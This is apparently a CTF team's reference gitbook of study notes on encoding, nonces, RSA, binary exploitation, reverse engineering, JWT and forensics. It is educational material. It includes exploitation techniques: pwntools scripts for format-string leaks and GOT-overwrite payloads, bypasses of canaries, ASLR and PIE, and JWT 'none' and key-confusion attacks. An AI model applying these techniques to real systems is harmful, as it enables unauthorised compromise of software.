1 of 25

References

Welcome!

Hi! Thanks for visiting this page, this is our references gitbook, a collection of notes about many cyber security subjects. If you'd like us to add any more references, feel free to shoot us an email at thewinrars@gmail.com, or send us a DM on twitter.

Crypto

Bases

A base is a number system that assigns characters to values. The most common numbering systems found in computer science are:

Base-2 (more commonly known as binary)
- Uses 0s and 1s to represent data
Base-10 (also known as denary)
- Uses the numbers 0-9 to represent data.
Base-16 (also known as hexadecimal)
- Uses 0-9 and the letters A-F to represent data.

There's also:

Base-8 (also known as octal)
- Uses the numbers 0-7
Base32
- Uses A-Z, 2-7 and =
Base 64
- Uses A-Z, a-z, 0-9, + - =
Base85
- Uses ASCII values 33-117

In normal, everyday use, we commonly use base 10 to represent numbers, as we don't often deal with large numbers on a day-to-day basis.

We can also represent values in different number systems, which can end up making some numbers look very odd to the untrained eye. For example:

255 in denary
FF in hexadecimal
1111 1111 in binary.

To show you all of these, I will now encode the message: {Hello! We are The WINRaRs} in Base 2, Base 8, Base 16, Base 32, Base 64, and Base 85.

Base 2

01111011 01001000 01100101 01101100 01101100 01101111 00100001 00100000 01010111 01100101 00100000 01100001 01110010 01100101 00100000 01010100 01101000 01100101 00100000 01010111 01001001 01001110 01010010 01100001 01010010 01110011 01111101

Base 8

173 110 145 154 154 157 41 40 127 145 40 141 162 145 40 124 150 145 40 127 111 116 122 141 122 163 175

Base 16

7b 48 65 6c 6c 6f 21 20 57 65 20 61 72 65 20 54 68 65 20 57 49 4e 52 61 52 73 7d

Base 32

PNEGK3DMN4QSAV3FEBQXEZJAKRUGKICXJFHFEYKSON6Q====

Base 64

e0hlbGxvISBXZSBhcmUgVGhlIFdJTlJhUnN9

Base 85

HUq^aCi:I>=(NL_Eb-@mBOr;f8PW/l;KI6

Notice how as we go along, the encoded strings get shorter? That's because we have more available slots to assign characters to.

You can even try and decrypt these messages here: https://gchq.github.io/CyberChef/#input=e0hlbGxvISBXZSBhcmUgVGhlIFdJTlJhUnN9

Nonces

The use of nonces means that an attacker can't just replay previous comunications, as it will not be authenticated by the same chosen nonce. In the SSL/TLS handshake, the client and server exchange nonces, preventing man in the middle attacks.

Nonces can also be used in encryption, like AES-GCM mode. In this case, it is very important a nonce is not reused. The addition of a nonce makes it difficult for the attacker to gain information about the plaintext from a ciphertext, as well as making sure the same plaintext does not get mapped to the same ciphertext every time. However, if a nonce is reused, even without knowing the nonce an attacker can gain valuable information about the two plaintexts given two ciphertexts encrypted with the same nonce. In AES-GCM, if two ciphertexts are encrypted with the same nonce, then the xor of the two ciphertexts will be equal to the xor of the two plaintexts. This is also true for the IV of OFB and CTR encryption. This can give an attacker information on the plaintexts. The more ciphertexts encrypted with the same plaintext, the more information an attacker can gain.

RSA

please don't use rsactftool

RSA is a cryptosystem first proposed in 1977 by Ron Rivest, Adi Shamir, and Leonard Adleman, and is one of the most famous public-key cryptosystems.

It is used for 2 things:

Encrypting a message with a public key. This can then be decrypted with a private key.
Signing a message digitally allows it to be verified and makes sure it hasn't been tampered with.

The core of RSA is that there are things that are very easy to do one way, and very very challenging to do the other way. The example that RSA uses is multiplying prime numbers together. Take the two prime numbers 97 and 83. We can multiply these two numbers very easily using a calculator or pen and paper, giving 8051. However, if I were to give you the number 2059, and asked you to find the two primes which multiply to give it, it is much harder to do this and takes a lot longer to do so.

This is called a 'trapdoor function' and such functions are used all over cryptography.

Simple Ciphers

One of the earliest encryption methods, Ciphers, were used to encrypt plaintext into something called ciphertext. The simplest way to do this would be to use a Caesar Cipher. Named after Julius Caesar, Caesar encrypted his messages with this cipher, making messages seem like gibberish to the normal eye, but very easy to decrypt. Anyways, enough with the caesar cipher history lesson, let's move on to other ciphers.

A Vigenère cipher uses what a Caesar Cipher built a basis on, except an alphanumerical key is used.\

Caesar cipher only has 26 usable values, 1-26

This makes the Vigenère cipher a lot harder to crack. These further advancements lead to much stronger encryption, making messages harder to crack, due to an increase in the number of charcters used to encode / encrypt the messages.

This Vigenere cipher was also used in this .

Pwn

Canary

not the bird!

Canary

A canary is a random value placed on the stack to detect buffer overflow attacks. Before a function returns, the value is compared to the original, random value - if they are different then buffer overflow has taken place and the program crashes.There are two main ways to bypass canaries - using a format string vulnerability (if one exists) or brute-forcing it (which is not feasible on 64-bit machines).

Canary and Format String

Format string vulnerabilities allow us to leak arbitrary values off the stack. Since the canary is (by definition) on the stack, this allows us to read the value. The key to finding which item on the stack is the canary, if you cannot be bothered to look at the disassembly, is to iterate through every offset several times. Canary values always end in 00 and are different every time, so they are fairly distinguishable. We advise turning ASLR off when testing for canaries to eliminate false positives (as ASLR randomises libc addresses every time the program is run). The way stack canaries work is as follows:At the beginning of the function, a random value is moved into a local variable:

mov rax, qword fs:[0x28]
mov qword [var_8h], rax

At the end of the function the value in this local variable (var_8h) is checked again with the random value qword fs:[0x28] and if they are different crashes the program:

mov rax, qword [var_8h]
xor rax, qword fs:[0x28]
je [leave]
call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
leave

var_8h is once again moved into rax, which then compares with the original random value. If they are equal, the program jumps to the leave instruction. If not, it calls __stack_chk_fail. So, knowing the value through format string, we want to find the offset between the beginning of our input buffer and the stack value. Luckily we can use an RE tool to do this as the rax register is involved, and our preferred tool of choice is radare2. Firstly, generate a De Bruijn pattern using ragg2:

ragg2 -P 100 -rAAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh

Then run the program in debug mode, input the sequence and set a breakpoint right after rax reads the variable value:

r2 -d vuln> aaa> db 0x00400945> dc

We then use wopO to work out the offset using the De Bruijn pattern.> wopO dr eipAnd this gives us the offset between the buffer and the canary.

Format String Attack

5.4 moment

A format string vulnerability is caused when printf, sprintf, or other functions that use formatting are called directly on user input.

For example,

char input[20];
fgets(input, 20, stdin);
printf(input); // This is horrible coding practice!
printf("%s", input) // This is good coding practice!

What is string formatting?

String formatting allows you to put integer values, character values, pointer values, string values and much more within a string to be printed, scanned to a file, scanned to a variable, and much more.

Specifier

Purpose

Decimal number

Hexadecimal pointer. Reads 4 bytes on 32-bit and 8 bytes on 64-bit

Hexadecimal integer. (Reads 4 bytes on most systems)

Read data as a pointer to a string

Take the value as an address. Write the number of characters previously printed to this address.

So, why does this matter? How is it vulnerable? To understand this, we must think about how the CPU knows where to get arguments. On a 32-bit system, arguments are commonly placed on the stack. First argument on the top, second argument is the next value down, etc.

On 64-bit systems, the arguments are stored on RDI, RSI, RDX, RCX, R8, and R9. If there's any more arguments, they are stored on the stack. Now think. How does the CPU know a value on the stack was supposed to be an argument and isn't just a random value? Spoiler: it doesn't. Thus, if our input is printed directly, e.g printf(input), We get a vulnerability.

As it's first argument, printf expects a string format. This means we can use format specifiers to read values off of the stack. To explain further: Imagine we type %x into our input on a 32-bit binary. The binary then calls printf(input);. Given the %x, it will go take the first argument off of the stack and print this back. In reality, it's just the first value on the stack.

Thus, we get the ability to read values off the stack. This can be incredibly useful in order to leak things like the binary base, libc base, or canary in order to bypass PIE, ASLR and canaries respectively. We can leak instruction pointers, libc symbols, and much more.As well as a read vulnerability, we get an arbitrary write with format strings. Remember %n? It takes the argument as an address, and then writes the number of characters previously written to that address.

In order to make use of this, we must think of some special things we can do to format specifiers. % pads the output of the specifier to be a specific number of bytes, whilst %$ goes to the numberth argument(1st argument if number is 1, 2nd argument if number is 2 etc) and uses that specifier on it.So, we can use something like %c to make sure printf prints the number of characters we want before %n.

The problem is, we need the address to be stored somewhere on the stack for this to work. If your input's on the heap, you aren't in luck. But if we've got something like this:

char input[20];
fgets(input,20,stdin);
printf(input);

Our input will be on the stack! All we have to do is find out how far our input is along the stack, and we can use it. Remember: we can use %$ to jump to a certain value on the stack. With this same logic, we can arbitrarily read values from memory using %s, as %s will read the value on the stack as a pointer to the string and print said string.

Creating format string payloads can be tedious manually, especially if they need to be dynamic, or overwrite multiple values. With pwntools, we can use a few special things. First of all, let's look at the FmtStr object type.

With the FmtStr object type, we can dynamically calculate how far our input is along the stack. Take this example:

from pwn import *
e = ELF("./sample_elf")
def write_fmt(data):
  p = e.process()
  p.recvline()
  p.sendline(data)
  output = p.recv()
  p.close()
  return output
obj = FmtStr(execute_fmt = write_fmt)
...

The above code generates a pwntools FmtStr object. The pwntools FmtStr object takes an argument function that allows it to execute format string and get the output. With this, it automatically calculates the offset of the input on the stack via leaks and cyclic patterns. Now, let's look at generating payloads.

from pwn import *
e = ELF("./sample_elf")
def write_fmt(data):
  p = e.process()
  p.recvline()
  p.sendline(data)
  output = p.recv()
  p.close()
  return output
obj = FmtStr(execute_fmt = write_fmt)
writes = {e.got['puts']: e.plt['system']} # Here we supply a dictionary of form {address: value to write}. In this case, we're executing a GOT overwrite, overwriting puts@got with system@plt.
payload = fmtstr.fmtstr_payload(obj.offset,writes)

The above code gets the offset attribute of the FmtStr object, containing the offset of the input on the stack. It then uses the pwntools function fmtstr_payload to generate a payload given a dictionary of writes and an input offset. There's a lot more to format string attacks using pwntools, you can read about it here https://docs.pwntools.com/en/stable/fmtstr.html

Fuzzer

Here's a quick fuzzer I wrote for format string challenges. The idea is to leak pointers at various offsets, and see if any of them are a LIBC symbol (won't catch offsets such as read+14):

from pwn import *
context.arch = "amd64" # Change as applicable
e = ELF("./format") # Binary name
p = process(e.path)
l = p.libc    # Load libc, initialised with correct values
rev = {value : key for (key, value) in l.sym.items()}
# Flip sym:addr dict
def exec_fmt(pl):
    p.sendline(pl)
    return p.clean()
# Assumes process loops forever; you'll need to spawn a new process
# in this loop if you only get a few leaks

for x in range(0, 100):
    # Leak pointer at offset
    l = exec_fmt(f'%{x}$p').strip()
    try:
        l = int(l, 16)
        print(f"%{x}$p : {hex(l)} - {rev[l]}")
        # Print matching symbol if found
    except:
        pass

python3 fuzz.py SILENT=1
-----------------------------------------
%21$p : 0x7ffff7f9a5c0 - _IO_2_1_stderr_
%25$p : 0x7ffff7f9a5c0 - _IO_2_1_stderr_
%28$p : 0x7ffff7f9b4a0 - _IO_file_jumps
%30$p : 0x7ffff7f9a5c0 - _IO_2_1_stderr_

NX, PIE, RELRO and ASLR

Whilst stack canaries mainly exist to defend against stack overflow, NX, PIE, RELRO and ASLR fight against many attacks.

NX - No-execute. It means that pages like the stack and the heap are made unexecutable, and the pages that must be executable are made unwritable.

PIE - Position Independent Executable. (Please note this isn't just a protection, sometimes it is required for shared libraries and such). It means that the binary base of the application is different each run, so code within the binary like gadgets, or the PLT and the GOT and such are not in a constant location.

RELRO - Relocation Read-only. Partial RELRO means that the GOT is relocated to a place which we will not be able to reach via overflow. Full RELRO means the GOT is relocated, and read only, preventing GOT overwrite attacks.

ASLR - Unlike other protections, this one lives in the kernel, not a binary. There's no compiler option to enable or disable this. ASLR is much like PIE, but for imported things and other pages of the memory like libraries and the stack, randomising their base offset.

NX

One of the simplest buffer overflow attacks is that on the stack, overwriting the return address to be the address of shellcode and using shellcode (and sometimes NOP sleds) to spawn a shell. NX defends against this, making the stack, heap and other places in memory non-executable. Generally, it's very hard to bypass this, however it is possible using a function called mprotect. Mprotect allows you to change the protections of certain areas in memory. Under specific circumstances, like if we had the ability to control pages or knew the address of the stack, would allow an attacker to use mprotect to make the stack executable again, and execute a classic buffer overflow attack.

PIE

By itself, PIE isn't too large of a problem. When combined with other things, however, it gets very annoying. For example, one solution to the NX problem is to use something called ROP - return oriented programming. Or it's cousin JOP - jump oriented programming. These involve creating chains of "gadgets", addresses of pieces of code placed inside of the binary that can be used to carry out specific tasks, like control registers or execute system calls. With PIE, this becomes much harder, as the addresses of these gadgets will not be static.

Another technique that PIE mitigates would be ret2libc. This is where an attacker uses functions inside of the standard c library to create a shell. With ASLR(which will be explained shortly), this can be quite difficult. However, given buffer overflow, things inside the binary like the PLT and the GOT can be used to leak the libc base, giving an attacker the power to perform ret2libc. PIE means that the PLT and GOT won't be static.

So, how can we bypass this? One way is a format string attack. If the binary is vulnerable to a format string attack, we can leak addresses in the binary. If we leak an address in the binary, we can subtract a specific offset from it to leak the binary base. Say there's a global variable, var1. This variable var1 is stored inside of the binary at the offset 0x567. On the stack is the address of var1. If we leak the address of var1, we can subtract 0x567 to get the binary base.

Other possibilities include the ability to brute force values like the RIP/EIP byte by byte due to forking and variable length inputs. More on this later.

Generally, however, we leak the binary base by leaking the address of something in the binary, then subtracting the needed offset.

Relro

In some rare cases, buffer overflow to a global variable can allow an attacker to overflow and overwrite the GOT. Partial RELRO relocates the GOT to a place that cannot be reached via overflow, and makes certain parts of it read-only. However, this still opens up the avenue for a GOT overwrite. Full RELRO completely mitigates GOT attacks by making the entire GOT read-only after resolution. This is almost unbypassable, however still vulnerable to the mprotect attack I mentioned earlier in the context of NX.

ASLR

SLR randomises the position of many places in memory, like libraries and the stack. This helps to prevent against attacks like ret2libc, which rely on knowing the exact location of things inside of the libc. The libc base or stack address can be leaked via a format string attack, similar to PIE. We can also use the PLT and the GOT to leak the addresses of certain functions in the libc, like so:

Remember, after a dynamic function was called once in the PLT, it is resolved so that it's GOT entry holds the actual address. Any form of arbitrary read will allow us to read the GOT and get the address of one of the libc functions. With the address of a libc function, all that is required is to subtract it's appropriate offset in the libc to get the libc base, defeating ASLR.

An example is using the PLT. We can call upon the plt entry of a function to emulate the actual function. For example, say puts has been called before. We can call upon puts@plt, using puts@got as an argument. The program would then print the value of puts@got(the address of puts in the libc!) as a string, giving us the ability to calculate the libc base and defeat ASLR.

Generally, ASLR is defeated if you can accurately get the address of something inside of libc, like a variable or a function.

ASLR is a kernel protection. Whether or not ASLR is on is determined by the system and not the binary. You can control it with echo <0,1,2> | sudo tee /proc/sys/kernel/randomize_va_space. 0 means ASLR is off, 1 means partial, 2 means full.

pwntools

pwntools is an incredibly powerful python library which greatly simplifies your life when it comes to binary exploitation. It provides a much simpler interface with the program, includes a host of in-built functions for common operations and allows smooth transitioning between local and remote exploits.

Setting it all up

Importing pwntools

Unlike most python packages, with pwntools we generally import everything and don't bother about efficiency.

The ELF class

The ELF class is the class you will be using most often for your Linux exploits; it allows you to instantiate an object that directly handles the executable itself.

e = ELF("./executable")

Processes

When we want to interface with a running executable we use a process. Processes can either be made by themselves or be linked to a specific ELF object (if you want to further interact with the process' object outside of the process).

process = process("/bin/sh")
process = elf.process()			# elf is an ELF object

You can also create a remote process to interface with executables on a network:

p = remote("host.hosty.net", 31337)	# takes in a host and a port

Communicating with the Executeable

Note: In these examples, p is a process object.

p.sendline(text)

Sends the text to the executable. Generally the main way you respond to input prompts and deliver payloads.

p.recvline()

Quite literally what it sounds like. Receives data until the next newline characters (\n). Returns a string (the data read) in case you want to print it.

Note: An incorrect number of these can cause your program to seem to fail when it doesn't but is rather just waiting for input. This should be the first thing you check if everything else seems to make sense.

p.clean()

Generally receives all data sent to it. Make sure there isn't an error here before you move on to other sections of your exploit.

p.recvuntil(string)

Receives all data until it encounters the string argument, after which it stops receiving.

Packing Integers

pwntools makes packing integers easy. While you would normally use the struct module and the struct.pack() function, these functions have a host of options that we simply do not need or are hard to remember in which case we need which arguments. This is where pwntools comes in.

p32(integer)

p32() takes in an integer and returns the representation of that integer as a series of bytes, much like struct.pack(). p32(0xdeadc0de) == b"\xde\xc0\xad\xde"

u32(bytes)

u32() does quite the opposite - takes in a series of bytes and returns the integer representation of them, much like struct.unpack(). u32(b"\xde\xc0\xad\xde") == 0xdeadc0de

p64() and u64()

These have the same function as p32() and u32() but are for 64-bit binaries.

Logging

log.info(text)

Prints text to the screen in a special format to note that it's a log. Useful for distinguishing between text produced by the program and your own debugging. There are other functions for various levels of warning.

Context

Context allows you to set some defaults to prevent you from having to repeat yourself. For example, context.endian = 'little' makes all future p32() and u32() functions (as well as other similar ones) use little endian, meaning you don't have to specify every time you use the function.

The GOT and the PLT

There are many functions in c. Examples being fgets, system, fopen, dup, dup2, etc. etc. All or many of these functions are included in the C standard library, which we call libc.

Libc is essentially a shared object file that stores all sorts of variables and functions a binary will need. Almost every binary imports this library at an address, usually this address is different every execution due to ASLR.

Note: not all binaries need libc. Some don't use libc functions at all, some are static and carry all of the libc functions they need along with them.Note 2: We're talking about libc here, but this applies for all dynamic libraries.

The problem arises: how can the binary know where the function it needs is located if the address at which libc is imported is constantly changing? That's where the GOT and the PLT come in.

GOT stands for Global Offset Table. It is a section existing in the binary that holds the real addresses of functions that are in dynamic libraries. For example, printf@got holds the address of printf.

PLT stands for Process Linkage Table. It holds PLT "stubs" - small pieces of code, of which their purpose is to jump to the correct function, or set things up.

When dealing with dynamic functions, the program will call upon stubs in the PLT, not the functions directly.

At the beginning of the program, the GOT may hold the addresses of the PLT instead of the actual addresses, or it may hold the addresses of resolution or identifier functions.

The first time running a dynamically linked function, the PLT will be jumped to. The PLT will fall into it's "default" nature, resolving the address of the actual function, updating the GOT to hold this address, then jump to the function.

Afterwards, anytime the PLT is called again, it will simply read the GOT to get the address of the function, then jump there.

If full relro is not on, the GOT is not read-only. This can lead to a GOT overwrite attack, in which we overwrite the GOT entry of a function with another address. Say, for example, puts is called on our input after a vulnerability that gave us an arbitrary write. We would be able to overwrite puts in the GOT with the address of system in the PLT perhaps, then input /bin/sh.

When puts@plt would run, it would check puts@got, which would hold the address of system, and then jump there, allowing us to control the program's execution.

Reverse Engineering

Assembly

There's a lot to learn here - it's a whole new language! I've devoted a whole page to learning assembly here, but if you want a quick overview for the information that you need in CTF's, here they are:

Registers:

Registers are pieces of hardware, located near to the CPU. They hold instructions (or data) that are used in the execution of the program. The data is stored here, rather than RAM, as it's quicker for the CPU to access the instructions inside registers. These instructions inside a program will store data in the different registers. They come in different sizes:

We also have different registers for different purposes. These are:

We also have some other registers that are very important to note:

We'll dig into what these registers do in the page about assembly, found here (also at the top of the assembly partion on the page)

Syntax

Assembly comes in two different flavours, or rather, two different syntax's. One syntax is Intel, the other being AT&T. You do have to note which syntax you're analysing, as it can become quite frustrating moving from Intel to AT&T and vice-versa.

Intel:

This syntax, in CTF's, is the most likely syntax that you'll see. So it's good to get to know how Intel syntax is displayed.

This is Intel syntax. It's asked to require the operand first (eg. mov), then asks for the destination of where the data will be going, then ask for the source - where the data will be provided from.

The operand here is mov, the destination here is eax, and the source is 0. This instruction is saying "move the constant 0 into the eax register".

AT&T:

This syntax is less seen in CTF's, but it still appears sometimes.

This is AT&T syntax. Notice the difference?

We have the destination and the source mixed around so that it's the other way! Whyyyyyyy... who knows. The intel command that we just showed, in AT&T syntax, is

So here we've got a tiny bit more to dissect. AT&t uses movl as the operand (as opposed to mov), then has the source as $0 (this being the constant 0), then the destination as %eax. The $ sign means that a value is a constant, and the % means that the value is a register. Fortunately, a program has to stick to one syntax throughout execution, so lucky us for not having to convert each time!

Assembly code:

So, now that we've got that out the way, let's take a look at some actual code for assembly. All of this will be explained in more detail here, but just as a general overview, here are the most important commands needed for CTF's (I'm going to use Intel syntax for easier reading):

mov, - move data from the source to the destination cmp, - compares the register to the register / value, and depending on the outcome, will normally come a jump instruction to take a different path. jmp - loads the value of the label (a function or memory address) into the rip register, which the program will then execute those commands call - jump to the function or memory address with a return function - basically calls a subroutine. push - push the register or value on to the stack to reserve it pop - pops the top value off of the stack, which is stored in the register pop [register]- (the square brackets are necessary) - pops the value off of the stack, saving it into a position in memory, such as ebp-0x8 test, - performs a bitwise AND operation on the register by the value , - as it says on the tin - provides a math operation (add, subtract eg.) to the register by the register/value So there you have some actual code of assembly under your belt! Welcome to the reversing world!

CTF Tips And Tricks

There are some things that I always use when doing anything before actually running the binary. This is called static analysis - analysing the binary or thing in question when it's not changing, or not running - being the same, or static.

The very first thing that I like to do is see what "low hanging fruit" we have available, or what information we have available without much effort.

Strings:

I like to first check what strings are in the binary. to do that, we run

Just because we love radare2 and its family, we might as well get used to some of it's family members and their syntax. In the strings, we might find a flag, some username or passwords, anything that may help us investigate the binary further.

File type:

Next, we want to check what file type we're dealing with. We have two main file types that we find in CTFs:

We can find out what type of executable it is by running:

rabin2 will return a lot more information about the binary than just it's file type (if it's little or big endian, has a canary, full or partial pic etc.). It's mainly used when doing pwn from the amount of information that we get from it, but it's still a nice tool to have.

Trace program execution:

Here, we're seeing what is happening with the program - we're now moving to dynamic analysis, as we're executing the binary and seeing what steps it's taking. To see a trace of the program, we can use either:

The difference between these two tools is that strace intercepts system calls made by the glibc and other libraries directly into the kernel. ltrace intercepts library and system calls made by the application to C libraries such as glibc. They do display similar outputs, but it's good to know what each tool does before diving straight into it.

If we don't get anything from these, then we start to play around with the binary. We execute it, and see what prompt it asks us for. We can input any of these to see what output we get:

Characters: "A"
Strings: "Hello World"
Integers: 1
Floating point numbers: 1.5
Negative numbers: -1
Boolean: True or False
Format strings: %x
Buffer overflow: (Provide more characters than the buffer can accept)
Hex: 0xdeadc0de
And some more may come to me later :)

If none of those work, then I think that it's time to start using our tools.

Tools

going brrrrrr

So, one of the first thing that we need when dealing with reverse engineering are tools. Can't do much without them!

Some of the tools that I like to use are:

Kali Linux (Yes, I'm counting it as a tool as much as an Operating System. Live with it :) )
Radare2 and its family
Ghidra

Those are my main tools for reversing a binary. So, lets get them installed onto our machine. -> I've covered how to install these tools here

Other tools that I haven't used, but you may be familiar with them are:

IDA (Pro)
Hopper
dnSpy
Ollydbg
Binary Ninja

And many more that I haven't heard of!

Once we've got everything set up, we're good to go!

Angr

Bruteforce but smart

Angr is a powerful binary analysis framework which has come in handy several times in CTFs. It does a huge amount of stuff, so I'm only going to cover the few things I've used it for.

Symbolic Execution

Angr can analyse binaries by inputting 'symbols' rather than literal text. What happens to these symbols (comparisons, transformations) is then recorded, allowing us to get a picture of what a binary is doing. The main usage I've gotten out of this is flag-checker challenges, where we are expected to enter a flag, our input goes through a series of transformations, and is compared against a constant to check if the entered value is correct. Here's a script I used to solve Beginner from Google CTF 2020.

import angr, claripy
target = angr.Project('a.out', auto_load_libs=False)
input_len = 15 # Discovered with manual analysis at a glance
inp = [claripy.BVS('flag_%d' %i, 8) for i in range(input_len)]
# Define an array of 8 bit vectors ffor each char of the flag
flag = claripy.Concat(*inp + [claripy.BVV(b'\n')])

st = target.factory.full_init_state(args=["./a.out"], stdin=flag)
# Create a simulation with our flag symbols as stdin
for k in inp:
    st.solver.add(k < 0x7f)
    st.solver.add(k > 0x20)
# Add constraints that the characters should be printable

sm = target.factory.simulation_manager(st)
sm.run()
y = []
for x in sm.deadended:
    # Out of the simulations that exit, record
    # any that output SUCCESS
    if b"SUCCESS" in x.posix.dumps(1):
        y.append(x)

#grab the first ouptut
valid = y[0].posix.dumps(0)
print(valid)

This particular example isn't great, as it is basically a brute force, as I was just getting to learn angr. However, it shows how easy it makes it for challenges with light brute forcing.

Here's a better example: Beginner Rev from Fword CTF

import angr
import claripy #the solver engine

proj = angr.Project("./welcome", auto_load_libs=False)
sym_arg_size = 0x10 #Length in Bytes because we will multiply with 8 later
inp = [claripy.BVS('flag_%d' % i, 8 ) for i in range(sym_arg_size)]
flag = claripy.Concat(*inp + [claripy.BVV(b'\n')])
state = proj.factory.full_init_state(args=["./welcome"], stdin=flag)
for byte in inp:
    state.solver.add(byte >= ord('0'))
    state.solver.add(byte <= ord('9'))
# Input is specified to be a number
simgr = proj.factory.simulation_manager(state)
good = 0x400000 + 0x12b2
# Address of flag file being opened
bad = [0x400000 + 0x1669, 0x400000 + 0x167b]
# Addresses of failure messages being printed
simgr.use_technique(angr.exploration_techniques.DFS())
simgr.explore(find=good, avoid=bad)
# Explore input that will end at the good while avoiding the bad
found = simgr.found[0]
print(found.solver.eval(flag, cast_to=bytes))
# Cast our found input to bytes and print

This is a much more intelligent way of exploring the binary, and printed 1755121917194838 after only 20 seconds.

Tools Setup

Radare 2

Kali comes pre-installed with radare2. You can check by doing:

$ radare2 --version

If it's not installed, then we can either download it from apt

$ apt-get install radare2

Windows:

Or you can install it from github:

$ git clone https://github.com/radare/radare2.git
$ cd radare2
$ sys/install.sh

(Or without root permissions)

$ sys/user.sh

And then to run it:

$ r2

Ghidra:

Ghidra is a tool that the NSA released for it to be open source back in April 2019, and it's an amazing tool.\

Official download link: https://www.ghidra-sre.org/
Github page: https://github.com/NationalSecurityAgency/ghidra
Full installation guide found here: https://ghidra-sre.org/InstallationGuide.html

The software needed to install ghidra is as follows (taken exactly from the installation guide):\

Java 11 64-bit Runtime and Development Kit (JDK)
Free long term support (LTS) versions of JDK 11 are provided here:
- AdoptOpenJDK
- Amazon Corretto

If, for whatever reason, your installation doesn't go as expected, here is ghidra's troubleshooting page: https://ghidra-sre.org/InstallationGuide.html#Troubleshooting

Linux:

Once you've downloaded ghidra as a zip file, you need to unzip:

$ unzip ghidra_*_PUBLIC_*.zip
$ sudo apt-get install default-jdk

Change directories into the ghidra folder, and then run using

$ ./ghidraRun

Windows:

Extract the zip file to any location that you would like (I'm going to be using the desktop)

Right click on zip -> extract all / extract (here)

Open the Environment Tables window:

Right click on windows start button -> Click on "System"
Click "Advanced System Settings" on the left (Administrative priveleges needed)
Click "Environment Variables" at the bottom

Add the JDK bin directory to the PATH variable

Under "System Variables", click "Path" -> edit -> new
Type the path of where you extracted the zip to + "\bin"
Click "ok" -> "ok" -> "ok"

To run:

Navigate to zip extraction path
Run ghidra.bat

Web

JWT

Javascript Web Tokens - A method of storing data on the client side so that it is readable, but not writable by the end user. The format is 3 JSON objects, joined by a .; first is a header (containing metadata about the token, such as the signing algorithm). The next segment is the data, which contains the actual data held. The final portion is the signature, which consists of the header and the data passed through a cryptographic function. The idea is that users cannot generate a correctly signed signature, without knowing some server secret.

None Algorithm

In some implementations of JWT, it is possible to set the algorithm to 'None'. This means that passing an empty signature will result in maliciously crafted data passing a signature check.

HS/RS256 confusion

If a webapp uses RS256, the data is signed using an RSA private key, then checked using the corresponding public key. The HS256 algorithm uses a single secret to encrypt and decrypt. If a webapp does not force RS256, the header can be switched to HS256. This will result in the public key being used as the 'secret'. If the public key can be obtained, it can be used to sign a message, which will pass checks on the server.

Forensics

Analysing Network Packet Captures

the best category :)

Part 1: What is a Network Packet Capture?

A network packet capture (or pcap for short) is a list of captured packets over a network. This is usually used from a blue team perspective, to find a flag in a "Capture The Flag" competition. However, in a penetration test, a pen tester may capture packets to grab important pieces of information, such as passwords.

Part 2: What software can be used to analyse Packet Captures?

When searching for software to analyse packet captures, you may be overwhelmed with the choice. The software that we'll be using in this explanation will be wireshark. Wireshark is open source and free, which is why it makes it my software of choice. A simple search for your system will give you a guide on installation.

Part 3: Analysing The Packet Capture

When analysing a packet capture, the first thing I recommend doing is organising the packets by protocol.

Out of all these packets, the 3 GET requests in the HTTP protocol section look the most interesting. I will highlight them to help them stand out.

However, there is no text data here, as seen by the 304 errors. Let's try again.

Now, let's give these a read.

Double clicking on the packet brings you to this:

This gives us some really useful info of:

ssssh! they arent supposed to see this, keep quiet and read the next file. xoxo - [redacted]

This tells us to read 2.txt.

This file states:

ok, this should be really hard for the defenders to see. I'm gonna encode the important data with a secure method that the attackers wont get :)

66 6f 72 65 6e 73 69 63 73 20 69 73 20 6d 79 20 70 61 73 73 69 6f 6e 20 3a 29

enjoy! :)

If you aren't in the know, maybe we should read the last highlighted packet, 3.txt.

This file states:

Did you really forget the encoding method? oh my, i guess i'll have to tell you: base16

now i really hope the defenders dont see this

Bingo! We now have the encoded text and the encoding method.

Now, we can decode this using , and we get the message of forensics is my passion :).

I hope you enjoyed this, and took something away from it :)

Disk Images

Downloads, downloads, downloads... Some help for the (unfortunately rather uncommon) disk image challenges you might come across!

Tools for Analysing Disk Images:

Autopsy (my personal reccomendation)
FTK Imager

Autopsy

A wonderful and powerful tool for the analysis of disk images. By default, it will run ingest modules when provided with a disk image such as Exif Parser and Extension Mismatch Detector among many others. However, these can take a little while to run if you leave them all on by default - especially with larger images. Modules such as Hash Lookup can very easily be left disabled for CTFs as this is something that is usually used in actual forensic investigations: comparing a list of hashes of "known bad" files to the files that are in the disk image. Usually, the disk image will contain files that you will also have to analyse and mess with to get flags. A good example of this is RACTF2020's "Disk Forensics Fun" where a Linux Alpine image that contains files is given. I would recommend trying this challenge out for practice, as well as the other forensics challenges from RACTF2020.

Steganography

As a category, forensics as almost become infamous for this type of challenge: the frankly, uninspired kind.

Common Tools:

Images:

Steghide
Zsteg
Digital Invisible Ink Toolkit (diit)
Stegsolve
Exiftool

Text:

Stegsnow

Audio:

Deepsound
WavSteg

Other:

Binwalk
Foremost